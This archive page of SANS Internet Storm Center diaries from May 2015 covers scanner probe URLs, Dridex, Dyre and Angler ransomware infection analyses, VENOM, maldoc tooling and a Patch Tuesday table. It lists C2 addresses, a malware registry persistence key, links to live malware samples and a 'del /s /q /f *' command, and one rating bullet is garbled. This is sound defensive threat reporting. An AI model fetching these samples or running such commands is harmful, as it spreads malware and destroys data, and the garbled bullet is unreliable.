   6771  GET /phpMyAdmin/scripts/setup.php HTTP/1.1\r\n
   6638  GET /pma/scripts/setup.php HTTP/1.1\r\n
   6511  GET /myadmin/scripts/setup.php HTTP/1.1\r\n
   4297  GET /manager/html HTTP/1.1\r\n
   3939  GET /manager/html/ HTTP/1.1\r\n
   3672  GET /tmUnblock.cgi HTTP/1.1\r\n <- Linksys Routers (see "Moon Worm")
   2820  GET /pony/includes/templates/error.tpl HTTP/1.1\r\n

Two of our top ten URLs are attacking exclusively devices. So better make sure you are patched as well as it gets, and try to avoid exposing the admin interface to the public.

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

0 Comments

Published: 2015-05-18

Address spoofing vulnerability in Safari Web Browser

A new vulnerability arised in Safari Web Browser that can lead to an address spoofing allowing attackers to show any URL address while loading a different web page. While this proof of concept is not perfect, it could definitely be fixed to be used by phishing attacks very easily.

There is a proof of concept http://www.deusen.co.uk/items/iwhere.9500182225526788/. From an iPad Air 2 Safari Web Browser:

From same iPad using Google Chrome:

The code is very simple: webpage reloads every 10 milliseconds using the setInterval() function, just before the browser can get the real page and so the user sees the "real" web address instead of the fake one:

We are interested if you notice any phishing attacks using this vulnerability. If you see one, please let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail: msantand at isc dot sans dot org

3 Comments

Published: 2015-05-16

VENOM - Does it live up to the hype?

Unless you have been hiding under a rock this week you have heard about VENOM.  The first article that I saw was from ZDNet with the headline of "Bigger than Heartbleed, 'Venom' security vulnerability threatens most datacenters".  Pretty provocative stuff.  Is VENOM really worth that much hype?
 
VENOM stands for Virtualized Environment Neglected Operations Manipulation. The cute acronym basically means that the exploit takes advantage of a vulnerability in legacy code. In short the vulnerability is CVE-2015-3456 and it is found in fdc.c, the floppy disk controller software, used in some virtualization products. the most popular ones being QEMU, Xen and KVM.  The  vulnerability will permit someone with administrator access in the virtual machine (VM) to potentially escape the VM and execute arbitrary code from within the host virtualization software, with the permissions of the host virtualization software. The worst case scenario is that the attacker could escape to the guest operating system and access other guests on the same machine. To the best of my knowledge nobody has succeeded in demonstrating the worst case.
 
Should we panic?
 
This vulnerability is important because it has the potential to affect a significant portion of the virtualization platforms that are in common use today, but there is no reason to panic. 
* The vulnerability cannot be compromised remotely, nor is it possible to remotely scan for this vulnerability.
* In order for the attacker to even attempt to exploit the vulnerability they need to have shell level access as an administrator level to a virtualized guest.
* While a proof of concept exists that exploits the vulnerability, nobody has demonstrated any practical use of the exploit.
* Patches are available for all affected virtualization platforms. 
 
Certainly not of the significance of Heartbleed or FREAK.  While it is important to get vulnerable systems patched as soon as reasonable there is no reason to panic.
 

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)

4 Comments

Published: 2015-05-15

Another Maldoc? I'm Afraid So...

Guess what? Yep, there's yet another type of malicious document going around. Like last time, it's a MIME file with an MSO file containing an OLE file.

The sample (schro_193B11.xls 7F8C5E8B7157B04FA8E9CEEF13C28AB9) is an Excel spreadsheet saved as a MIME file:

But this time, the compressed data is at another position inside the MSO file:

So I updated my oledump tool (V0.0.16) to search for compressed data inside MSO files (in stead of looking at a fixed position 50).

The string encoding used in the VBA code is interesting. It is reminiscent of RC4:

I also updated my plugin plugin_dridex with this encoding:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

3 Comments

Published: 2015-05-14

Oh Bloat!

I recently installed a new printer. Windows didn't seem to know its driver, so I "had" to supply the CD-ROM that came with the printer. Of course, being a device driver, it asked for admin privileges to install. I went for custom install instead of full, but that option failed and crashed in EMET with a buffer overflow. Not a good omen. But since I wanted to print, I de-selected "custom" and went for "recommended". Yes, I'm naive at times. Apparently, all it takes to "p0wn" me is to ship me a printer together with a CD. [blush].

20 minutes later, I was the proud owner of FOUR pieces of software that have NOTHING to do with printing. What the [beep]! And to add insult to injury, TWO of the four pieces didn't show up in Add-Remove-Programs, and hence could not be "easily" evicted again. The most annoying piece was "isuspm", Acresso Software Manager. Completely getting rid of the four pieces of bloatware required use of Sysinternals "Autoruns", plus generous "del /s /q /f *" at the prompt, plus six! reboots. Yes, I probably could have reverted to a snapshot, but I kinda wanted to keep the printer driver itself.

Hello, dear printer vendors: Charge me 15$ more for the printer, if you must, but stop wasting my time un-installing all that [beeping] [beep]!

If you are in a similar situation, ignore whatever comes with the printer (especially the CD!), go to the web site of the printer manufacturer, and search for the device driver for the model at hand. Somewhat to my surprise, they offered an "expert" install that came without all the crud, and just included the driver. Now .. why can't this minimal installation also be on the CD? Why screw all the poor home users [and naive ISC handlers :)] for no good reason except to make five measly dollars on the side??

 

8 Comments

Published: 2015-05-13

Recent Dridex activity

Introduction

Botnet-based Dridex malspam is like the Energizer Bunny.  It just won't quit.  We see it almost every day.

Since last year, botnet hosts pushing Dridex have been using macros in Microsoft Word documents or Excel spreadsheets to deliver the malware [1].  These files are most often attachments in malicious spam (malspam).

Dridex traffic has evolved somewhat since I last blogged about it [2].  For this diary, we'll look at a wave from Tuesday, 2015-05-12 as described on the Dynamoo Blog [3].  I saw a few of these messages while reviewing emails blocked by my employer's spam filters.  Let's take a closer look...

Email Example

Nothing really ground-breaking here.  In this wave, hosts associated with Dridex malspam used the recipient as part of the name for the malicious attachment, but we've seen this before.

Traffic Generated by the Malware

I infected a host by running the Excel spreadsheet and enabling macros.  Reviewing the traffic with Security Onion revealed several info and policy events.  It also alerted for likely Dridexs cert in the SSL traffic.

A pcap of the traffic is available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-traffic.pcap

Below is a list of HTTP GET requests and other indicators of compromise (IOCs) associated noted in the pcap file:

  • 141.101.112.16 port 80 - pastebin.com - GET /download.php?i=5K5YLjVu
  • 92.63.88.87 port 8080 - 92.63.88.87:8080 - GET /bt/get.php 
  • 5.9.44.37 port 80 - savepic.org - GET /7257790.jpg
  • 14.98.183.4 port 443 - TLS traffic
  • 31.24.30.65 port 443 - TLS traffic
  • 46.36.217.227 port 3443 - TLS traffic
  • 75.145.133.5 port 443 - TLS traffic
  • 82.112.185.104 port 8000 - TLS traffic
  • 87.117.229.29 port 443 - TLS traffic
  • 144.76.109.82 port 443 - TLS traffic
  • 45.55.154.235 port 80 - encrypted traffic
  • 79.149.254.3 port 80 - encrypted traffic / TLS traffic
  • 27.60.164.164 port 443 - SYN packet only (no response)
  • 65.51.130.39 port 443 - SYN packet only (no response)
  • 82.17.98.133 port 443 - SYN packet only (no response)
  • 89.228.50.77 port 1443 - SYN packet only (no response)
  • 95.163.121.215 port 80 - SYN packet only (no response)
  • 131.111.216.180 port 443 - SYN packet only (no response)

Screenshots from the Traffic

After enabling macros for the malicious Excel spreadsheet, the host called for a visual basic script (VBS) file from pastebin:

The VBS file generated an HTTP GET request to download a Windows executable file (the Dridex malware):

Shortly after that, a small JPG image was downloaded by the infected host:

Dridex activity included SSL traffic to various IP addresses, mostly with example.com SSL certificates.  I also noted an SSL certificate for example.net as shown below:

SSL traffic happened on various TCP ports, including port 80:

Malware

People have submitted the Windows executable to various public sites for malware analysis:

A zip archive of the malware is also available at: http://malware-traffic-analysis.net/2015/05/12/2015-05-12-dridex-malware.zip

The zip file is password-protected with the standard password. If you don't know it, email me at admin@malware-traffic-analysis.net and ask.

Final Notes

The last time I looked into Dridex traffic, I saw a lot of post-infection HTTP GET requests over port 80.  In this example, the post-infection traffic was mainly SSL or otherwise encrypted.  Can't wait to see what Dridex has in store for us next!

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://researchcenter.paloaltonetworks.com/2015/01/dridex-banking-trojan-begins-2015-bang/
[2] http://www.malware-traffic-analysis.net/2015/04/15/index.html
[3] http://blog.dynamoo.com/2015/05/malware-spam-attn-outstanding-invoices.html

10 Comments

Published: 2015-05-12

May 2015 Microsoft Patch Tuesday Summary

Overview of the May 2015 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS15-043 Cumulative Security Update for Internet Explorer
(Replaces MS15-032 )
CVE-2015-1658, CVE-2015-1684, CVE-2015-1685, CVE-2015-1686, CVE-2015-1688, CVE-2015-1689, CVE-2015-1691, CVE-2015-1692, CVE-2015-1694, CVE-2015-1703, CVE-2015-1704, CVE-2015-1705, CVE-2015-1706, CVE-2015-1708, CVE-2015-1709, CVE-2015-1710, CVE-2015-1711, CVE-2015-1712, CVE-2015-1713, CVE-2015-1714, CVE-2015-1717, CVE-2015-1718 KB 3049563 . Severity:Critical
Exploitability: 1
Critical Critical
MS15-044 Vulnerabilities in Microsoft Font Drivers Could Allow Remote Code Execution
(ReplacesMS13-034 MS13-082 MS15-023 )
CVE-2015-1670 CVE-2015-1671 KB 3057110 . Severity:Critical
Exploitability: 1
Critical Critical
MS15-045 Vulnerability in Windows Journal Could Allow Remote Code Execution
(Replaces MS14-038 )
CVE-2015-1675
CVE-2015-1695
CVE-2015-1696
CVE-2015-1697
CVE-2015-1698
CVE-2015-1699
KB 3046002 . Severity:Critical
Exploitability: 2
Critical Critical
MS15-046 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution
(ReplacesMS13-085 MS15-012 MS15-022 MS15-033 )

CVE-2015-1682
CVE-2015-1683
KB 3057181 . Severity:Important
Exploitability: 1
Critical Important
MS15-047 Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution
(Replaces MS12-066 MS15-022 )

CVE-2015-1700
KB 3058083 . Severity:Important
Exploitability: 2
Important Critical
MS15-048 Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
(Replaces MS12-038 MS13-015 MS13-040 MS13-082 MS14-009 )

CVE-2015-1672
CVE-2015-1673
KB 3057134 . Severity:Important
Exploitability: 3
Important Important
MS15-049 Vulnerability in Silverlight Could Allow Elevation of Privilege
(Replaces MS14-014 )

CVE-2015-1715
KB 3058985 . Severity:Important
Exploitability: 2
Important Important
MS15-050 Vulnerability in Service Control Manager Could Allow Elevation of Privilege

CVE-2015-1702
KB 3055642 . Severity:Important
Exploitability: 2
Important Important
MS15-051 Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege
(ReplacesMS15-023 )

CVE-2015-1676
CVE-2015-1677
CVE-2015-1678
CVE-2015-1679
CVE-2015-1680
CVE-2015-1701
KB 3057191 vuln. public. Severity:Important
Exploitability: 0
Important Important
MS15-052 Vulnerability in Windows Kernel Could Allow Security Feature Bypass
(Replaces MS15-010 )
CVE-2015-1674 KB 3050514 . Severity:Important
Exploitability: 2
Important Important
MS15-053 Vulnerabilities in JScript and VBScript Scripting Engines Could Allow Security Feature Bypass
(ReplacesMS11-031 MS12-056 )

CVE-2015-1684
CVE-2015-1686
KB 3057263 . Severity:Important
Exploitability: 2
Important Important
MS15-054 Vulnerability in Microsoft Management Console File Format Could Allow Denial of Service

CVE-2015-1681
KB 3051768 . Severity:Important
Exploitability: 2
Important Important
MS15-055 Vulnerability in Schannel Could Allow Information Disclosure
(ReplacesMS15-031 )
CVE-2015-1716 KB 3061518 . Severity:Important
Exploitability: 1
Important Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urt practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
    • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threatatches.

       

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

4 Comments

Published: 2015-05-12

Angler exploit kit pushes new variant of ransomware

Introduction

The Angler exploit kit (EK) is being used to push a new variant of TeslaCrypt/AlphaCrypt ransomware.  I've been documenting cases of Angler EK pushing AlphaCrypt in recent weeks [1][2][3].  Last week on 2015-05-07, I started seeing a new variant [4].  This new variant has a popup window that uses CTB-Locker-style instructions.

As seen below, this variant doesn't provide a name for itself in the decrypt instructions.

The same malware sample used a different bitcoin address for each host it infected.

Traffic Characteristics of this New Ransomware Variant

The traffic appears identical to what we've seen with previous infections from TeslaCrypt and AlphaCrypt.  A few hours ago I infected a host from a site using Angler EK and received similar alerts from the network traffic.


Shown above:  Alerts from monitoring the infection with Security Onion.


Shown above:  HTTP traffic from the infection.  Click on the image to see it full-size.

A sample of the ransomware can be found at: 
https://malwr.com/analysis/MjE3ODRlYzc1MmQ2NGUyNDkyYWNkNWM0OWZiOGVjYzE/

I infected 4 different hosts with Angler EK in a 5-hour timeframe and received the same ransomware.  It was the same file with the same hash each time.  However, the bitcoin address for the ransom payment was different for each infected host.  Shown below are decrypt pages from the other 3 hosts:

Here are the bitcoin addresses from these infected hosts:

  • 14ctiiDNPLNh2YqmHFaPexAasi6vL5cqKX
  • 1K23HDxnozzdfnzgmLeGGUkwyqpPmucnQS
  • 1KcYaNQFsSm5hPX36Y855jsjceazoB3MXZ
  • 1QJmYhyBWrjCDqvYmk6hh4drpX7NN7TVxq

​Pcap files of the infection traffic (Angler EK and the post-infection) are available at:

Final Words

From what I can tell, TeslaCrypt and AlphaCrypt are very similar to CryptoLocker.  This new, unnamed variant appears to be another evolution from this family of ransomware.

I've been seeing a lot of Angler EK lately.  In recent weeks, more often than not, it's been pushing ransomware.  Since 2015-05-07, I've only seen this new variant.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://malware-traffic-analysis.net/2015/04/30/index.html
[2] http://malware-traffic-analysis.net/2015/05/06/index.html
[3] http://malware-traffic-analysis.net/2015/05/07/index.html
[4] http://malware-traffic-analysis.net/2015/05/07/index2.html

2 Comments

Published: 2015-05-11

SOC Analyst Pyramid

Introduction

Last weekend, I did a 10 minute fireside chat during lunch at BSidesSATX 2015 [1].  It was an informal presentation, where I discussed some of the issues facing security analysts working at an organization's Security Operations Center (SOC).

With only 10 minutes, the largest part of that presentation covered a "SOC analyst pyramid" of activity any organization will encounter.

For the presentation, security analysts are defined as people who monitor their organization's network for near-real-time detection of malicious activity.  Security analysts review alerts from their organization's intrusion detection systems (IDS) or security information and event management (SIEM) appliances.  These alerts are based on various sources, such as network traffic and event logs.

SOC Analyst Pyramid

Below is a visual representation of this pyramid:

As seen in the image above, the pyramid from top to bottom reads:

  • Targeted attacks
  • Malicious activity - not blocked
  • Malicious activity - blocked or not applicable
  • False positives or non-threat

Base of the SOC Analyst Pyramid

The base of the SOC analyst pyramid consists of false positives or valid activity unique to your organization's network.  In my years as an analyst, investigating this activity took up the majority of my time.  At times, you'll need to document why an alert triggers a false positive, so it can be filtered and allow the team to focus on real suspicious activity.

In my experience, no matter how well-tuned your security monitoring system is, analysts spend most of their time at this level of the pyramid.

Next Tier: Malicious Activity - Blocked or Not Applicable

The next level involves malicious activity that's either blocked or not applicable.  Blocked activity includes spam with malware attachments (malspam) blocked by your organization's spam filters.  Non-applicable activity includes certain types of scanning.  The intent is malicious, but the scans are blind and not applicable to the targeted host.  For example, here's a short list of activity from the error logs of a server I run:

That server doesn't run WordPress, nor does it have any sort of web-based administrative login, but I'll find WordPress-based scans hitting the server's IP every day.  That shows malicious intent, but it's not applicable.

SOC analysts worried about near-real-time detection of malicious activity generally don't spend much time with this tier of the pyramid.

Next Tier: Malicious Activity - Not Blocked

The next tier of the pyramid involves malicious activity that somehow makes it past your organization's various security measures. This level includes drive-by infections from an exploit kit after viewing a compromised website.  Depending on your organization's policies, adware might be an issue.  Resolving issues involving adware or potentially unwanted programs (PUP) might give SOC personnel practice for resolving hosts infected with actual malware.  Just make sure analysts don't focus on the adware/PUP.  The focus of a SOC should always be on malicious activity.

This level of the pyramid is where analysts develop their skill in recognizing malicious activity.  Exploit kit traffic might not infect a user's computer.  SOC personnel should be able to examine this sort of malicious traffic and determine if a host actually became infected.  After an alert, I've seen too many people assume a host was infected without digging in deeper to see what actually happened.

Malware or compromised hosts found at this level of the pyramid are not targeted.  This type of malicious activity is a concern for any organization.  It's not limited to your employer.

Top of the Pyramid: Targeted Attacks

This tier is where a SOC proves its value to an organization.  If bad actors, criminal groups, or hostile foreign agents gain a foothold in your organization's infrastructure, you might not be able to get rid of them.  Detecting intrusions early and preventing these bad actors from further access is extremely important.  Any number of sources will tell you data breaches are not a matter of "if" but "when" [2][3][4].

Targeted attacks include spear phishing attempts to gather login credentials from specific members.  Personnel using a chat system for sales or support can also be targeted.  Denial of Service (DoS) attacks or Distributed DoS (DDoS) attacks are usually at this tier.  Watering hole attacks [5] are also an issue.

Final Words

I've been a SOC analyst for two employers: one was the government, and the other is private sector.  In both cases, I believe the SOC analyst pyramid applies.  Feel free to leave a comment, if you have any opinions on the matter.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] http://www.securitybsides.com/w/page/91978878/BSidesSATX_2015
[2] http://www.securityinfowatch.com/article/12052877/preparing-for-your-companys-inevitable-data-breach
[3] http://www.maslon.com/webfiles/Emails_2015/LegalAlerts/2015_LegalAlert_CyberSecurity_DataBreach_webversion.html
[4] http://www.hechtins.com/blog/data_breach--not_if_but_when.aspx
[5] http://www.trendmicro.com.au/vinfo/au/threat-encyclopedia/web-attack/137/watering-hole-101

11 Comments

Published: 2015-05-10

Wireshark TCP Flags: How To Install On Windows Video

I was asked how to install on Windows the Wireshark TCP Flags dissector I wrote about in a diary entry a month ago.

To help these persons, I made a video.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2015-05-09

Malicious Word Document: This Time The Maldoc Is A MIME File

Bart Blaze Tweeted me a malicious Word document sample (MD5 23a2d596d927ceab01918cc1dfd5db68) that can not be analyzed with my oledump tool. It turns out to be a MIME file that contains a MSO file, that in turn contains an OLE file. We've seen MSO files containing OLE files when we talked about XML Office documents. I've updated my oledump tool (V0.0.15) to handle MSO files directly.

Bart has a blogpost explaining several methods to analyze this file.

If you want to use oledump, first you extract the MSO file from the MIME file, and then you use oledump. If you don't have a tool to handle MIME files, I have one: emldump.py.

Here you can see emldump and oledump piped together to analyze the maldoc:

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

0 Comments

Published: 2015-05-07

Security Awareness? How do you keep your staff safe?

If you’ve been following recent diaries from my fellow handlers Brad and Manuel, they peel the covers back on a couple current malicious emails campaigns.  Many of the readers of the Storm Center diaries will be use to the ebb and flow of these stories. Here in Australia there’s a speeding fine scam email [1] that’s been running for the last few weeks, and there’s no indication it will drop off any time soon. 

There is plenty of training, education and horror stories out on the Internet about malicious email, so why is it a recurring problem? One suggestion has been that it plays on human emotions. Threatening or enticing emails are designed to draw in the unsuspecting and then there are those users that will go to significant lengths to bypass security controls just to see the dancing cat/chicken/Hans Solo.

So providing useful and meaningful security awareness isn’t easy and has to be made relevant to individual audiences, even within the same organization. Providing the same training education to senior management and then a development group will probably miss the mark for both groups and result in a “Meh, I won’t fall for that”. Sadly generic security training often results in a trained staff member that still falls victim to a relatively convincing scam.

At this point you’d be expecting some wondrous solution. Sorry, not today.  I will say this is something that takes constant revising, effort and innovative thinking to engage your staff. I’ve mentioned before that SANS has some nifty resources [2], but I really love finding how people try to instill security in their organizations. A security engineer from Riot Games posted how his security team took a different approach to getting in the hearts and minds of their staff about thinking about security as a whole [3]. This goes back to build a story about being security minded that your audience understands, hopefully cares about, and starts to adopt in their working practices and lives. 

Will it stop everyone clicking links or opening random email attachments? I doubt it, but flipping a person from an attack vector to an attack alerter is a worthy goal.

If you have any other examples of innovative ways at getting people to care about good, basic security approaches, please add a comment or drop us a line [4]

 

[1] https://www.service.nsw.gov.au/news/afp-warns-public-email-traffic-infringement-scam   

[2] http://www.securingthehuman.org/resources/

[3] http://blog.markofu.com/2015/01/socialising-security-riot.html

[4] https://isc.sans.edu/contact.html

 

Chris Mohan --- Internet Storm Center Handler on Duty

8 Comments

Published: 2015-05-07

The Art of Logging

[This is a Guest Diary by Xavier Mertens]

Handling log files is not a new topic. For a long time, people should know that taking care of your logs is a must have. They are very valuable when you need to investigate an incident. But, if collecting events and storing them for later processing is one point, events must be properly generated to be able to investigate suspicious activities! Let's take by example a firewall... Logging all the accepted traffic is one step but what's really important is to log all the rejected traffic. Most of the modern security devices (IDS, firewalls, web application firewalls, ...) can integrate dynamic blocklists maintained by external organizations. They are plenty of useful blocklists on the internet with IP addresses, domain names, etc... It's quite easy to add a rule on top of your security policy which says:

if (source_ip in blocklist):
   drop_traffic()

With the "blocklist" table being populated by an external process. Usually, this rule is defined at the beginning of the security policy for performance reason. Very efficient, but is it the right place?

Let's assume a web application firewall which has this kind of feature. It will drop all connections from a (reported as) suspicious IP address from the beginning without more details. Let's put the blocklist rule at the end of the policy of our WAF. We have now something like this:

if (detected_attack(pattern1)):
   drop_traffic()
elif (detected_attack(pattern2)):
  drop_traffic()
elif (detected_attack(pattern3)):
 drop_traffic()
elif  (source_ip in blocklist):
 drop_traffic()

If we block the malicious IP addresses at the beginning of the policy, we'll never know which kind of attack has been tried. By blocking our malicious IP addresses at the end, we know that if one IP is blocked, our policy was not effective enough to block the attack! Maybe a new type of attack was tried and we need to add a new pattern. Blocking attackers is good but it's more valuable to know why they were blocked…

1 Comments

Published: 2015-05-05

Upatre/Dyre - the daily grind of botnet-based malspam

Malicious spam (malspam) delivering Upatre/Dyre has been an ongoing issue for quite some time.  Many organizations have posted articles about this malware.  I've read good information on Dyre last year [1, 2] and this year [3]. 

Upatre is the malware downloader that retrieves Dyre (Dyreza), an information stealer described as a "Zeus-like banking Trojan" [4].  Earlier this year, EmergingThreats reported Upatre and Dyre are under constant development [5], while SecureWorks told us banking botnets continue to deliver this malspam despite previous takedowns [6].

Botnets sending waves of malspam with Upatre as zip file attachments are a near-daily occurrence.  Most organizations won't see these emails, because the messages are almost always blocked by spam filters.

Because security researchers find Upatre/Dyre malspam nearly every day, it's a bit tiresome to write about, and we sometimes gloss over the information when it comes our way.  After all, the malspam is being blocked, right?

Nonetheless, we should continue to document some waves of Upatre/Dyre malspam to see if anything is changing or evolving.

Here's one wave we found after searching through our blocked spam filters at Rackspace within the past 24 hours:

  • Start date/time:  2015-05-04 13:48 UTC
  • End date/time:  2015-05-04 16:40 UTC
  • Timespan:  2 hours and 52 minutes
  • Number of emails:  212

We searched for subject lines starting with the word "Holded" and found 31 different subjects:

  • Holded account alert 
  • Holded account caution 
  • Holded account message 
  • Holded account notification 
  • Holded account report 
  • Holded account warning 
  • Holded bank operation alert 
  • Holded bank operation caution 
  • Holded bank operation message 
  • Holded bank operation notification 
  • Holded bank operation report 
  • Holded bank operation warning 
  • Holded operation alert 
  • Holded operation caution 
  • Holded operation message 
  • Holded operation notification 
  • Holded operation report 
  • Holded operation warning 
  • Holded payment alert 
  • Holded payment caution 
  • Holded payment message 
  • Holded payment notification 
  • Holded payment report 
  • Holded payment warning 
  • Holded transaction alert 
  • Holded transaction caution 
  • Holded transaction message 
  • Holded transaction notification 
  • Holded transaction report 
  • Holded transaction warning

The 212 messages had different attachments.  Here's a small sampling of the different file names:

  • abrogation_warning_information.zip
  • block_alert_data.zip
  • block_alert_document.zip
  • block_alert_report.zip
  • block_message_data.zip
  • block_message_statement.zip
  • cancelation_notification_data.zip
  • cancelation_notification_details.zip
  • invalidation_notification_details.zip
  • invalidation_notification_document.zip
  • nullfication_alert_report.zip
  • nullfication_message_information.zip
  • rejection_message_data.zip
  • rejection_notification_details.zip
  • rejection_warning_details.zip
  • rejection_warning_report.zip

Emails sent by this botnet came from different IP addresses before they hit our mail servers.  Senders and message ID headers were all spoofed.  Each of the email headers show the same Google IP address spoofed as the previous sender.  In the images below, the source IP address--right before the message hit our email servers--is outlined in red.  The spoofed Google IP address is highlighted in blue.  The only true items are the IP addresses before these emails hit our mail servers.  Everything else is cannot be verified and can be considered fake.

This wave sent dozens of different attachment names with hundreds of different file hashes.  I took a random sample and infected a host to generate some traffic.  This Dyre malware is VM-aware, so I had to use a physical host for the infection traffic.  It shows the usual Upatre URLs, Dyre SSL certs and STUN traffic we've seen beffore with Upatre/Dyre.


Shown above: Filtered Wireshark display of the pcap showing the infection traffic.


Shown above: EmergingThreats-based Snort events on the infection traffic using Security Onion.

Of note, icanhazip.com is a service run by one of my fellow Rackspace employees [7].  By itself, it's not malicious.  icanhazip.com is merely a free service that reports your host's IP address.  Unfortunately, malware authors use this and similar services to check an infected computer's IP address.  Because of that, you'll often find alerts that report any traffic to these domains as an indicator of compromise (IOC).

The Upatre HTTP GET requests didn't return anything.  Apparently, the follow-up Dyre malware was downloaded over one of the SSL connections.  Here's what I grabbed off the infected host:

Dyre first saved to:  C:\Users\username\AppData\Local\Temp\vwlsrAgtqYXVcRW.exe
Dyre was then moved to:  C:\Windows\vwlsrAgtqYXVcRW.exe

Registry keys for persistence:

Key name: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\googleupdate
Key name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\googleupdate
Value name: ImagePath
Value type: REG_EXPAND_SZ
Value data: C:\Windows\vwlsrAgtqYXVcRW.exe

A pcap of the infection traffic is available at:

http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-traffic.pcap.zip

A zip file of the associated Upatre/Dyre sample is available at:

http://malware-traffic-analysis.net/2015/05/04/2015-05-04-upatre-dyre-malware-sample.zip

The zip file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

Final words

It's a daily grind reviewing this information, and most security professionals have higher priority issues to deal with.  However, if we don't periodically review these waves of Upatre/Dyre, our front-line analysts and other security personnel might not recognize the traffic and may miss the IOCs.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://www.us-cert.gov/ncas/alerts/TA14-300A
[2] http://www.secureworks.com/cyber-threat-intelligence/threats/dyre-banking-trojan/
[3] http://securityintelligence.com/dyre-wolf/
[4] http://www.networkworld.com/article/2878966/microsoft-subnet/dyre-banking-trojan-tweaked-to-spread-upatre-malware-via-microsoft-outlook.html
[5] http://www.emergingthreats.net/about-us/blog/dyre-upatre-constant-development
[6] http://www.secureworks.com/cyber-threat-intelligence/threats/banking-botnets-persist-despite-takedowns/
[7] https://major.io/icanhazip-com-faq

3 Comments

Published: 2015-05-04

Traffic pattern change noted in Fiesta exploit kit

A few hours ago, Jerome Segura, Senior Security Researcher at Malwarebytes, tweeted about a change in traffic patterns from Fiesta exploit kit (EK) [1].

What had been semi-colons in the URLs from Fiesta EK are now commas.  Here's what we saw from my previous diary on Fiesta EK last week [2]:

Here's what I saw from infecting a host with Fiesta EK a short while ago:

Any signatures for detecting Fiesta EK that depend on those semi-colons will need to be updated.

A pcap of the traffic is available at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-traffic.pcap.zip, and a zip file of the associated malware is at http://malware-traffic-analysis.net/2015/05/04/2015-05-04-Fiesta-EK-malware.zip

The ZIP file is password-protected with the standard password.  If you don't know it, email admin@malware-traffic-analysis.net and ask.

I checked out the payload from this infection, and it has a digital signature spoofing Microsoft.

Didn't get any traffic out of the malware payload from publicly-available malware analysis tools:

While generating traffic for my previous diary on Fiesta EK, I saw 3 different payloads within a 2 hour period.  Every once in a while, I've seen digital signatures from Fiesta EK malware payloads, but I'm not sure what this particular payload is.  Haven't really had time to analyze it.  If anyone does have time, please leave a comment.

---
Brad Duncan, Security Researcher at Rackspace
Blog: www.malware-traffic-analysis.net - Twitter: @malware_traffic

References:

[1] https://twitter.com/jeromesegura/status/595002036027985921
[2] https://isc.sans.edu/diary/Actor+using+Fiesta+exploit+kit/19631

0 Comments

Published: 2015-05-03

VolDiff, for memory image differential analysis

VolDiff is a bash script that runs Volatility plugins against memory images captured before and after malware execution providing a differential analysis, helping identify IOCs and understand advanced malware behaviour. 
I had intended to include it in my latest toolsmith article, Attack & Detection: Hunting in-memory adversaries with Rekall and WinPmem, but quite literally ran out of space and time. 
Using WinPmem, as part of Rekall and GRR offerings, you can acquire two memory images, one clean image prior to infection or compromise, and one after buggering your target system.
As you'll note in the article, I compromised a Windows 7 x64 SP1 VM with a PowerShell one-two punch, the vast majority of which occurred in-memory only. While documenting the related activities for the column, I also took before and after images for VolDiff testing as follows:
winpmem_1.6.2.exe baseline.raw, and after pwnzorship, winpmem_1.6.2.exe compromised.raw.
I then ran ./VolDiff.sh baseline.raw compromised.raw Win7SP1x64 on my Ubuntu server and bingo, after much time and ado (VolDiff takes a while to be sure), out popped VolDiff-report.txt.
To summarize briefly from the article, the malfeasance I unleashed against that poor, unsuspecting VM was all executed in the context of powershell.exe. To that end, did the VolDiff results corroborate the findings achieved with Rekall? Absolutely! Note that the suspicious PIDs from the article are 1284 and 2396. You'll spot them prominently in the following snippets of affirmation:

| |  / /___  / / __ \(_) __/ __/
| | / / __ \/ / / / / / /_/ /_  
| |/ / /_/ / / /_/ / / __/ __/  
|___/\____/_/_____/_/_/ /_/     

Volatility analysis report generated by VolDiff v0.9.3.
Download the latest version from https://github.com/aim4r/VolDiff/.

Suspicious new netscan entries
===========================================================================

0x13c8993d0        UDPv4    0.0.0.0:0    *:*                                   2396     powershell.exe 2015-04-26 17:56:08 UTC+0000
